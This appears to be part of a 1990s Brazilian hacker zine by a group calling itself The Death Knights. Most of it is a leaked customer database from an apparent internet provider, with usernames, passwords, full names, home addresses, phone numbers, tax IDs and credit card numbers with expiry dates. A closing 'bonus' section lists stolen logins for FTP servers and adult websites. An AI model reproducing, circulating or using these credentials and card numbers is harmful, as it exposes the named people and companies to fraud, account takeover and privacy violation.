drmurad:netto:com:STANS MURAD NETTO:AV. ALDA GARRIDO480:RIO DE JANEIRO:RJ:22621000:MEDICO:08/01/31:021-235-2797:021-493-4771:021-493-4771:00684368749:4532070000845984:0298:cartao:250297:
chavier:CHAVE:com:Francisco Xavier de Lima Sobreira:Rua Giovane Carneiro 400:Sobral:CE:62011230:Mц╘dico:02/11/47:(088)611-0981:(088)611-1170:(088)611-1170:04694090372:4984206250820037:1097:cartao:250297:
koike:retakaba:chavepro:Alberto Akira Koike:R. Capote Valente 900 Ap. 92:Sцёo Paulo:SP:05409002:Bancц║rio:31/03/69:011+819-8599:011+3064-7511:011+3064-7511:09859507813:5390812306570172:0798:cartao:250297:nk7N*Ebbs2&mNEu
thaisses:cashmere:pop:THAIS SILVA E SILVA:Alameda Campinas 956 apto. 33:Sцёo Paulo:SP:01404001:Tradutora:::011-8844053:::4916741274834021:0898:cartao:250297:
kretcheu:jplluanda:especial:KRETCHEU ALVES:::::::::::5493508523290224:1198:cartao:250297:
prosenha:211188:pop:GIUSEPPE CALLA NETO:::::::::::4565080003649606:1297:cartao:250297:
bufano:123456:pop:CELSO BUFANO:::::::::::5448404490011197:0699:cartao:250297:
infober:solinfo:com:InfoSERVER Informatica Ltda:R. Maria de Lourdes Ponce 19:Osasco:SP:06023170:Infomatica::703-9002::705-2182:00602221000210:5390206435960414:1298:cartao:250297:
itacarga:cargas:famchavepro:Expresso Itamarati Ltda:Rua Pedro Amaral 3438:Sцёo Josц╘ do Rio Preto:SP:15014000:Transportes::017-2322722::017-2322354:59965038000141:4551661161692003:1198:boleto:250297:4N9UGytKSmgs7Ke
karla:seila:chavepro:Karla Borsato Perassolo:Rua Rubiao Junior 2820 apto. 111 centro:Sцёo Josц╘ do Rio Preto:SP:15010510:estudante:01/02/97:017-2333295:017-2333295::78498155800:4551661161692003:1198:boleto:250297:ft*7vE$CsStfkzv
guarapes:OCG1277:com:Organizacao Contabil Guararapes S/C Ltda:av. nova independencia nб╨ 409/413:sao paulo:sp:04571000:assessoria contabil/alex:05/12/77:5506-1549::5506-9926:48756191000142:::boleto:250297:
farialim:banespa:manual:Banco do Estado de Sao Paulo S/A:av. Brig. faria lima nб╨ 2491:sao paulo:sp:01452000:banco multiplo/ pasquarelli:25/02/97:816-7277::8162235:61411633013408:::boleto:250297:
pres:sergiok:imesp:IMESP:Rua da Mooca 1921:sao paulo:sp:03103902:imprensa oficial do estado:25/02/97:291-3344:::48066047000184:::boleto:250297:
indl:nicola:imesp:IMESP:Rua da Mooca 1921:sao paulo:sp:03103902:imprensa oficial do estado:25/02/97:291-3344:::48066047000184:::boleto:250297:
lombra:afs:com:Stephan Alexander Spremberg:Rua Miranda Guerra 383:Sцёo Paulo:SP:04640000:Industrial:12/05/70:011-7131006:011-5420534:011-7131006:14387250860:376427127992007:0699:cartao:250297:
doe:gabinete:imesp:IMESP:Rua da Mooca 1921:sao paulo:sp:03103902:imprensa oficial do estado:25/02/97:291-3344:::48066047000184:::boleto:250297:
imesp:assessor:imesp:IMESP:Rua da Mooca 1921:sao paulo:sp:03103902:imprensa oficial do estado:25/02/97:291-3344:::48066047000184:::boleto:250297:
jornal:richard:imesp:IMESP:Rua da Mooca 1921:sao paulo:sp:03103902:imprensa oficial do estado:25/02/97:291-3344:::48066047000184:::boleto:250297:
cti:tecnologia:cortesia:IMESP:Rua da Mooca 1921 / CPD:sao paulo:sp:03103902:Grц║fica do Estado:25/02/97:291-3344 R208::292-2993:48066047000184:::boleto:250297:
chry:1509960:com:Cristiane de Souza Cavalcante:R. Cel. Souza reis 231:Sцёo Paulo:SP:03069010:Agente de Viagem:25/07/69:011-9414159::011-9414159:13293007856:5493113416780587:0998:cartao:250297:
spraybr:sprbr:com:Spraying Systems do Brasil Ltda:R. Salgado de Castro 320:Diadema:SP:09920690:Manufatura de bicos e acesso.::(011) 713-4233::(011) 713-3573:52462215000128:376437753774009:0799:cartao:250297:
sergiore:portinar:com:Sergio Ricardo Evangelista:RDa Constituinte 168 Ap81:Sцёo Paulo:SP:04204030:Cirurgiцёo Platico:02/02/67:0112746626:0112746626::10202531856:4916741091423016:0698:cartao:250297:
cisne:negro:com:Cisne Cia. de Danцїa:Rua das Tabocas 55:Sцёo Paulo:SP:05445020:Espetц║culos de danцїa::011 814-0337:011 814-4966:011 212-2327:66516766000131:376425870412009:0997:cartao:250297:
sdrumond:DRUSS:com:SIRLANO SAURO DRUMOND:R JOAQUIM PEIXOTO 185:SAO PAULO:SP:03382160:ANALISTA DE SISTEMAS:03/09/63:(011) 867-4492:(011) 6916-1924:(011) 867-1566:06045040805:4011320013047015:0998:cartao:250297:
coto:LEAORH+:fam:MARCO ANTONIO MONTEIRO SAMPAIO:R JOц┐O AVELINO PINHO MELLц┐O 120-APTO. 11:Sц┐O PAULO:SP:05659010:ADVOGADO/ADMINISTRADOR:30/07/42:(011)55821627:(011)8468205:(011)8468205:23232390820:5448102115355268:0399:cartao:250297:
tajo:2550755:com:Moreira Santos:R. Miquelina T. Cristillo66:Taboцёo da Serra:SP:06755020:Empresц║rio:10/05/62:011 79672592:011 79672592:011 79672592:03769897854:5390710820170166:1297:cartao:250297:
nathalia:7585:com:Joцёo Vicente de Assunцїцёo:R. Barцёo do Triunfo 332 apt. 101:Sцёo Paulo:SP:04602000:Engenheiro:30/07/44:(011)530-5624:(011) 532-0375:(011) 530-5624:02118041853:376428280602003:0699:cartao:250297:
series:1949:com:SERIES REPRESENTACOES E COMERCIO DE VEIC:AV RIO BRANCO 620:SAO PAULO:SP:01206000:::011-222-2499:011-981-2478:011-222-3126:60399920000156:4916741549985020:1298:cartao:250297:
freitasj:freitas:com:Julia Maria Freitas:Av. Giovanni Gronchi 1342:Sцёo Paulo:SP:05651001:::011-8422030:011-8422030:011-8422030::4011300280537013:1298:cartao:250297:
earth:sky:com:Raimundo gomes da silva neto:rua manuel vitorino 343:sao paulo:sp:03017020:Analista de Negocios:27/05/60:011 6086211:::03370065800:5390584493060487:1099:cartao:250297:
accr:01ACCR:com:ACCR COMISSARIA DE DESPACHO LTDA:RUA DIAMANTINA 538 1o ANDAR  SALA 14:Sц┌O PAULO:SP:02117010:DESEMBARACO ADUANEIRO::011-954-2005:011-64516620:011-955-0791:00628166000157:5390827255540240:0899:cartao:250297:
sellexbr:instituto:manual:Comint Comercio Exterior Ltda:rua cardoso de almeida nб╨ 788 11б╨ and:sao paulo:sp:05013001:comercio ecterior/carlos:24/11/92:872-2015::872-1024:69159309000125:::boleto:250297:
lifetime:nabnab:com:Lafetime Travel Ltda:rua jardim botanico nб╨ 635 cj 202:rio de janeiro:rj:22470050:agencia turismo/ivan silva:25/02/97:021-2940092::021-2590436:32165664000105:::boleto:250297:
fortrade:FOCA:com:Fortrade Fibras Sinteticas Ltda:r. augusta nб╨ 2516  8б╨ and conj 81/82:sao paulo:sp:01412100:textil/ giovani gomes:25/02/97:853-9977::883-0058:00541636000140:::boleto:250297:
hospway:WAYHOSP:com:Centro Mц╘dico Integrado Jardim Ltda:Rua das Bandeiras 347:Santo Andrц╘:SP:09090780:HOSPITAL::4401877- R 1603:979-5664:4401877- R 1612:72884737000125:4916584632433015:0998:cartao:250297:
jacola:qwert:com:jaco marques:rua faustolo 2345:sao paulo:sp:08650102:digitador:15/10/69:011-9446521:011 -686-5263:nao::4916741013150028:1298:cartao:250297:
andrecur:cury:com:Terezinha de Jesus Periard Cury:Rua 14 63 Parque Mambucaba:Angra dos Reis:RJ::Empresц║ria:24/02/97::0243  623004:0243  623004:85984191768:4916750537607041:0199:cartao:250297:
bertunes:bertunes:manual:Elias de Souza Bertunes:Rua Flayban Freza 49:Sao Paulo:SP:06050150:Analista de Sistemas:20/07/56:011 8198421:011 72095576:011 8132850:89970730878:4011300149577010:1098:cartao:250297:
arjonas:adv04478:com:rodrigo arjonas:r.brigadeiro jordao 229 ap.51:sao paulo:sp:04210000:musico(estudante):20/08/77:011-2155411:011-69158196:011-2749819::5448402539792348:1199:cartao:250297:
jaraujo:jose:com:Jose Araujo Lima Filho:Av. Brig. Luis Antonio  1272 apto 86:Sцёo Paulo:SP:01318001:Supervisor:07/08/57::011 2889974:011 2889974:25796143115:4916741454616016:1198:cartao:250297:
edrodsan:sandra:com:Edmundo R dos Santos Jr:Rua Bц╘lgica 89:Sцёo Paulo:SP:01448030:Comerciante:10/08/37:011 30648920:011 2802312::08657009820:376420761316005:1199:cartao:250297:
nordico:123:com:LUIZ OTAVIO SCHNEIDER:RUA PEDROSO 322:SAO PAULO:SP:01322010:CONSULTOR:06/03/60:(011)284-1944::(011)287-9147:47664100097:5493109096260783:0898:cartao:250297:
nalpet:leba54:com:abel aquino de souza:rua tenente americo moretti 656:sao paulo:SP:04352060:E53MPRESARIO:02/05/54:011 55626307:011 55626307:011 55626307:28835727634:5493828360900192:0899:cartao:250297:
ddebbie:turbo:com:Debora Cristina C. Ferreira:R. Prof. Arthur Ramos 350 apt 702d:Sao Paulo:SP:01454010:Comerciante:03/03/73:011 843 1503:011 813 242:011 843 1503:15755999880:376440898211002:0599:cartao:250297:
yarud:turbo:com:Alberto Bacchiocchi Jr:R. Baltazar da Veiga 501 apto 82:Sao Paulo:SP:04510001:Comerciante:01/02/72:011 933 1013:011 822 2581:011 822 2581:15755996865:376426658091007:1098:cartao:250297:
pcolombo:grafite:com:Paulo Heitor Colombo:Al. Dos Sorimans 243:Sцёo Paulo:SP:04068010:Empresц║rio:08/01/52:011 5351397:011 55815092:011 5315988:89995805804:5390829715200159:0999:cartao:250297:
rlopes:supergu:com:Ricardo Josц╘ Ferreira Lopes:R. Prof.Rodolfo S. Tiago 45 / 94A:Sцёo Paulo:SP:03059050:Engenheiro EletrцЄnico:06/10/64:(011) 758-7928:(011) 264-3530:(011) 758-7636:08794938873:5390667630970815:1099:cartao:250297:
sssantos:0472:com:Sonia Souza Santos:Rua TeцЁfilo Ribeiro de Andrade 299 - apto. 101:Sцёo Paulo:SP:05466020:Advogada:21/01/61:835-9542:835-9542:833-9916:09007227890:4565080004065752:0599:cartao:250297:
jsbp:pupo:chavepro:Jorge de Souza Barros Pupo:Rua Peixoto Gomide 1526 apt 32:Sцёo Paulo:SP:01409002:Residencia:21/02/97::011 8831747:011 8831747:89911245853:5486480000059028:0199:cartao:250297:qBwSBjxu4Npv$Cs
paulalop:pls1:chavepro:Paula Lopes da Silva:Av. Joцёo Dias 285 apto. 17:Sцёo Paulo:SP:04723000:Empresц║ria:19/11/66:(011) 522-3492:(011) 246-6756:(011) 522-6419:08595299838:5390280858310134:0999:cartao:250297:jaLF6*M&YLnbpD4
ffreitas:lotus:com:Fernando de Freitas Barbosa:Rua Freguesia de Sцёo Romцёo 129:Sцёo Paulo:SP:08180150:Anц║lista de Suporte:08/07/76:011-832-2797:011-956-2497::16370417807:4551530129810009:0199:cartao:250297:
paes:233962:com:Francisco Paes Neto:Rua Conde de Itu 524 ap.71:Sцёo Paulo:SP:04741000:Mц╘dico:18/04/45:011+55111954:011+2473727:011+2471759:09623396791:376440408232001:0699:cartao:250297:
sant:282828:com:Marco Alessandro Santoni:R. Pelotas 184 ap. 101:Sцёo Paulo:SP:04012000:Engenheiro Civil:28/11/61:011 539-3028:011 571-3092:011 539-3028:03325486860:376422073492003:0398:cartao:250297:
opedroso:OEO1:com:OSMAR PEDROSO:R CATADUPAS Nб╨ 47:Sц┐O PAULO:SP:05307050:OP. DE COMPUTADOR:20/02/61:011-8268900:011-8350210:011-8350210:05261292808:4551820014485284:1199:cartao:250297:
fabior:naninha:com:Fabio Roberto Girckus:R Angelina Gazeta Romanini 34:Sцёo Paulo:SP:03266170:Engenheiro:17/02/66:011-8208616:011-69185184::11401031803:4011440265370061:1199:cartao:250297:
ju:thebest:com:Julia Mitsue Tashiro:R Major Freire 346 casa 03:Sцёo Paulo:SP:04304110:Analista de Sistemas:09/07/65:(011) 240-3639:(011) 578-0497::07701972803:5390820647350196:0299:cartao:250297:
ocj:426720:com:Oswaldo C. Jr.:Rua Benjamin Constant 470:Igarapava:SP:14540000:CD:31/03/66:016-772-1644:016-772-1544::08347734810:4984207232180037:0698:cartao:260297:
callado:huaengoo:com:Antonio Carlos Callado de Souza:Av. Presidente Vargas 482 - Sl. 811:Rio de Janeiro:RJ:20071003:Computaцїцёo Grц║fica:02/12/68:021-2534466:021-2381333:021-2534466:01334228795:5493703796623561:0698:cartao:260297:
ayae:erika:com:Ayae Ikeda:Av. Gustavo Adolfo 649:Sцёo Paulo:SP:02209000:Gerente de Dep. Proc. de Texto:06/07/43:011-2378462:011-2028339::21544808887:5493307179920550:1098:cartao:070397:
hmandic:black:especial:Homero Mandic:Rua Euclides da Cunha 865:Curitiba:PR:80730360:Estudante:07/08/81:041 322-1821:041 322-1821:041 335-9745::36224331260012:0598:cartao:070397:
talel:tarik:com:talel salle:rua perola 48:dracena:sp:17900000:medico:26/03/97:0188213195:0188213520::30146445953:4916584601966011:0898:cartao:070397:
asestini:0114:com:Ana Elisa Sestini:Rua Salvador Cardoso 48 - 12. andar:Sцёo Paulo:SP:04533050:Corretora:06/06/45:011 8203009:011 8203009:011 8203009:40256669872:4916572201417014:0998:cartao:070397:
novabase:nbs1997:com:NovaBase Software e Comц╘rcio Ltda.:Caixa Postal 239:Sцёo Josц╘ do Rio Preto:SP:15001970:Software e Hardware::(017) 225-1554:(017) 225-1554:(017) 225-1554:67083295000188:5390809261240171:0698:cartao:070397:
delarosa:285861:chavepro:Josц╘ Luis de la Rosa Mateos:Rua Dr. Josц╘ Andrade Figueira  540 apto 171:Sцёo Paulo:SP:05709010:Engenheiro:24/08/55:(011)833-4039:(011)844-3830:(011)833-4650:00625267826:4011460241270011:0198:cartao:070397:wf*F4et5AD&FN@P
barrile:omniomni:com:Tarcцґsio Luiz Barrile:Rua Pires da Mota 249:Sцёo Paulo:SP:01529001:Advogado:12/12/57:011 2390303:011 2700832:011 31154815:01082001830:5390556391431465:0997:cartao:070397:
assisgli:117prc:fam:Francisco de Assis de Siqueira Batista:Rua Pinto Teles 320 Bl.4/Apto302 - Jacarepaguц║:Rio de Janeiro:RJ:21341270:Eletrotц╘cnico:05/12/50:021 5181225  ramal 25:021 3503870::34349901787:4108610001015014:0797:cartao:070397:
janaina:Jude:com:Janaцґna Gonцїalves Moreira Ramos:Rua Carlos Palut 426 bloco 05 apto 503:Rio de Janeiro:RJ:22730310:Auxiliar de Escritorio:13/03/97::021-3489989::02570226785:4916740833544014:0398:boleto:070397:
gutti:0849:com:WITTEMBERG DE FARIAS ROCHA:AV. JOAO BARRETO DE MENEZES 939  APTO-102:SAO PAULO:SP:04370000:ANALISTA DE SISTEMAS:26/11/58:011 259-5948:011 5562-2965:011 605-7279:35953411987:4551820089241133:1298:cartao:070397:
celpoint:1975:com:Rudra Comц╘rcio e Serviцїos Ltda.:Rua Vieira de Moraes 1355:Sцёo Paulo:SP:04617014:Assistц╙ncia Tц╘cnica Motorola::0115424822::0115424822:96182720000275:5390202394451024:0598:cartao:070397:
flor:1234:com:ROSANA BAARINI:RUA JAPц┐O 85 - APTO. 132:Sц┐O PAULO:SP:04530070:ASSISTENTE DE MARKETING:17/03/68:(011) 280-7074:(011) 852-7522:(011) 280-7074:15357726892:4011300160898014:1098:cartao:080397:
aloc:sacatrap:chavepro:Andre Luiz O. da Costa:Rua Tupy s/n:Itatiaia:RJ:27530050:Comerciante:31/12/65:0243 51-1332:0243 51-1354:::4011320021457016:0998:cartao:080397:PdU*khJLBW&uH5#
grisi:120650:pop:ANTONIO GRISI:Rua Maria Paula 279 ap1001:Sao Paulo:SP:01319001:engenheiro::011 6065572:::26744597868:5448202210901451:0498:boleto:080397:
marcosca::apop:MARCOS CESAR AFONSO:Av. Paulista 671 Aptб╨ 615:Sцёo Paulo:SP:01311100:Analista de Suporte::011-8293366:011-2879925:::5390778602010140:0398:cartao:080397:
ess:FELUNENE:pop:EDILSON SANCHES DE SOUZA:R. ANTONIETA LEITц┐O 329 APTO.23:Sц┐O PAULO:SP:02925160:AUTONOMO::2914830:877-7273:291-4830::5493447010940316:0198:cartao:080397:
vpb:PRECISION:pop:PRECISION VPB:Rua Vicente Rodrigues da Silva 641:Osasco:Sp:06230096:::707-5911::707-8797::376434819351005:0799:cartao:080397:
tyrrell:220188:com:Christine Elizabeth de F.Teixeira:Rua Marques de Valenca 56 / 114:Rio de Janeiro:RJ:20550030:Bancaria:10/12/64:021 - 5680004:021 - 5680004::99353822734:4984109768409022:0398:cartao:080397:
car:jesus:com:Carlos Alberto Ramalho:Rua Fiacao da Saude 40 11 andar conj. 114:Sao Paulo:SP:04144020:advogado:06/07/61:(011) 5581-7267:(011) 822-5854:(011) 5584-5638:04538007854:376432181551004:0199:cartao:080397:
florian:lobinho:com:Wolfgang Diez:Rua Datas s/n:Carapicuiba:SP:06343250:empresario:05/04/43:011 605 2221:011 7287 3206:011 7287 0566:02921013843:5448402241492732:0699:cartao:080397:
acjs:187:com:ANA CRISTINA DE ANDRADE:PRACA STA ADELAIDE 34:SAO PAULO:SP:04318010:ESTUDANTE:05/03/97:011 55811001:011 55810002::26863773805:376440998411023:0699:cartao:080397:
picapau:noslingo:com:Nilson Gracia de Oliveira:R. Patrocinio da Costa Monsores n.38:Mogi das Cruzes:SP:08717340:Chefe de Projetos:02/07/68:(012)-354-1812:(011)-460-2990:(011)-460-2990:09514010841:5493448612290225:0198:cartao:080397:
lfcaneo:sciens:com:Luiz Fernando Caneo:Rua Diana 863 - apto 22B:Sцёo Paulo:Sp:05019000:mц╘dico - cirurgia cardiovasc.:11/09/59:011-5747245:011-8641765::05397879819:376440985002009:1198:cartao:080397:
x_men:MARVEL:com:Luiz Fernando G. de Souza:R. Campos Cerrados 59:Sцёo Paulo:SP:03587050:Programador de Computador:28/06/77:(011) 815-7700:(011) 6102-1143::25163756893:4011440014563016:1298:cartao:080397:
ypojucan:32151:com:Roberto Josц╘ Ribeiro de Araц╨jo:R. Catumbi 950 ENT 03 APTO 5:Sцёo Paulo:SP:03021000:Gerente Comercial:05/10/49:***************:(011) 292-6486:**************:05233208849:5390202254490591:0398:cartao:080397:
mcpl:semana2:com:Maria Clara de Paula Leite:Av. das Flores 88:Osasco:SP:06110100:Professora de Portuguц╙s:31/05/68:011 862-2900:011 701-6186::09661914800:4551830002433311:1297:cartao:080397:
riva:san:com:Edilson Martins Sanches:R. Capitцёo Andrц╘ Bertolini 29:JoanцЁpolis:SP:12980000:Contador:31/12/63:011-7869-9211:011-7869-9583::02446122850:5493583590810121:1099:cartao:080397:
waisses:silvita:com:Silvia Irene Waisse de Priven:R.Bergamota 388 Ap. 183:Sao Paulo:SP:05468000:Medica:15/10/61:(011)870-5438:(011)260-3187::11886770808:376440306903018:0799:cartao:080397:
emy:keyjun:com:Emy Kikuchi:Al Campestre 858:Santo Andrц╘:SP:09070200:Analista de Sistemas:27/03/60:(011)411-9634:(011)712-6109:(011)712-6109:04792876869:5448826486740118:0899:cartao:080397:
tere:marx:com:Terezinha Ferrari:R. Antonieta Leitцёo 293:Sцёo Paulo:SP:02925902:Prof. Universitц║ria:15/12/52:4493000:8757602:8757602:56599315887:5493163702380188:0299:cartao:080397:
celiamt:casa:fam:celia miyoshi tanikawa:rua manoel de soveral 77 ap 44 b:sao paulo:sp:02040120:analista de sistemas:28/03/97::0112985471::08336878831:4002351352380130:1099:cartao:080397:
uchino:BORODIN:com:DERLY HAYATO UCHINO:R.GUAPIAц┤U 45  - MIRANDц⌠POLIS:SAO PAULO:SP:04024020:SISTEMAS:02/04/65:011 55814879:011 55830438::06598898897:4984200658470032:0898:cartao:080397:
sdarin:maya02:com:Silvio Piropo Da Rin:R. Maria Angц╘lica 703/101:Rio de Janeiro:RJ:22461150:Cineasta:17/09/49:(021)527-5504:::29838169749:5390415182390481:1298:cartao:080397:
prdb:2388:com:paulo roberto danza botelho:rua nova york499-apto.43:sao paulo:sp:04560001:engenheiro:06/02/60:011 3067 8281:011 542 1087::55084010759:4011670020393012:0798:cartao:080397:
csantana:cristo:com:Carlos Roberto Santana:R. 9 de Julho 1148:Itararц╘:SP:18460000:Bancц║rio:20/07/63::015-532.3453::04449884833:4984201974760023:0199:cartao:080397:
llamb:passo:chavepro:Luciano Lamb:Diamantina 40:Sцёo Leopoldo:RS:93120150:Estudante:20/03/72::051 5681383::53553330015:5493709636880220:1197:cartao:080397:m@y5bE5aGrg&RPs
alcir:Alcir:com:Alcir Antonio Inglez da Luz:R. Prof Sebastiцёo Paranц║ 732 apto 11B:Curitiba:PR:80320070:Administrador:21/01/55::2430362:2430362:23229306953:4011440086612014:0298:cartao:080397:
ffs2309:pesquisa:com:Felipe Franco da Silveira:R. Dr. Diogo de Faria 1175 apto. 52:Sцёo Paulo:SP:04037004:Analista de Investimentos:23/09/76:011-867-4525:011-549-2442::26137701808:5390817349420145:1198:cartao:080397:
mcas:maine:com:Maria Carolina de Abreu Sampaio:Rua Pianu 127:Sцёo Paulo:SP:05454050:Mц╘dica:10/08/71:(011)3021-1339:(011)3021-1339:(011)3021-1339:18206660852:4565080003851905:1199:cartao:080397:
pinheiro:novo:chavepro:Antonio Pinheiro:Alameda Franca 116-Boa Vista:Sцёo Jose do Rio Preto:SP:15030120:Ger.Administrativo:24/09/42::232-4236:232-4236:20152981853:4551840019380785:0898:cartao:080397:5Dd*pz4v#GffGXB
fbw:whitaker:com:Fernando Brandao Whitaker:rua Dr. Amando Franco Soares Caiuby 88 apto. 192:Sao Paulo:SP:05640020:advocacia:06/07/67:011-6066908:011-8490745:011-6069798:11892868822:4011670009149013:0998:cartao:080397:
makio:211863:com:Jamil Makio Kuwano:Rua Arthur de Azevedo 1526:Sao Paulo:SP:05404004:Consultoria:10/07/62:011 5331122:011 2802575::03029358860:5390555384260824:0998:cartao:080397:
pprado:220461:com:paulo de araujo prado:r jaguaribe 463 ap 11:Sцёo Paulo:sp:01224001:medico:22/04/61:0112216441:0112144165::10406833800:36222443330053:1198:cartao:080397:
mcr:MCR:com:JULIO CESAR F. DE AZEVEDO:RUA PARц│ 24-MAMBUCABA:ANGRA  DOS REIS:RJ:23908000:OPERADOR NUCLEAR:25/01/55::0243-623110:0243-623234:40131912704:36222736780048:0698:cartao:080397:

-=[  ??  ]=-
.----------.
|  BONUS 2  \________________________________________________________________
`----------------------------------------------------------------------------'
                                 by Cacaio

        Este bonus nao e' muita coisa, somente uma lista de uns FTP's de
warez legaizinhos pra voces se divertirem e umas senhas porn! heeheheh...

=OK= 128.148.124.8  l&p:mp3
=OK= 130.239.125.101  l&p:mp3
Hyperion.gsini.net/heatwave	L:gne P:yfcnkxvz	-ok
www.penthousemag.com		L:wolfen42 P:harsh	-ok
http://www.webgirls.com		l:loser P:kewl		-ok
http://www.danni.com		L:berhack P:123456	-ok
www.69pornplace.com		L:ranma P:saotome	-ok
www.adultplayground.com		L:yellow P:yellow	-ok
www.alleykatz.com              	L:1alex      P:silver	-ok
www.voynet.com/                 L:earlybird P:special -ok
www.vegaslive.com               L:pdeitz P:111371	-ok
hyperion.gsini.net/afterdark     gne        rgepizqx	-ok
www.hmmmm.com                    letmein    letmein	-ok
www.centerfolds.com              mlc230     ejkwtkj2 	-ok
seventeen.fun.nl                Pocahon        0188
=OK= 134.241.100.76  l:vc p:juytgh
=OK= 207.194.57.198  /pub/____/Zeraw-Joy
=OK= 128.192.32.202  /incoming/_x0x_/ZeraW-or-Bust
=OK= 140.128.99.99 /upload l:ircftp pwd:ircftp
=OK= 128.223.168.41 / l:WAT p:W.A.T.
=OK= 198.53.214.31 / l: ice p: lip96
=OK= 193.219.32.132  L:warez P:jerry

-=[ 13 ]=-
.-----------.
| FEW WORDS  \_______________________________________________________________
`----------------------------------------------------------------------------'
                                 by Cacaio

        Quer saber quem sao nossos membros? De uma olhada em nossa page!
                                               http://www.deathknights.com

        Prez/founder: Cacaio
        Vice Prezidents: pIst0ls e ReNeGaDe

        Se voce quiser se tornar um membro, esqueca, ja temos muitos
        membros.

        Devido a problemas com um membro que tentou nos enganar, e tentara
enganar os outros, este zine demorou um pouco. Cuidado com o pessoal de
Joao Pessoa... tem muitas pessoas gente fina, mas outras....

        AVISO NOVAMENTE:

        O grupo The Death Knights nao visa nenhum fim lucrativo. Qualquer uso
        das informacoes contidas aqui nao e de nossa responsabilidade. Se voce
        fizer algo descrito e se der mal, problema seu. Nos ensinamos, mas nao
        pedimos para usarem o conhecimento adquirido com este zine.

        Ate o proximo zine!

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------
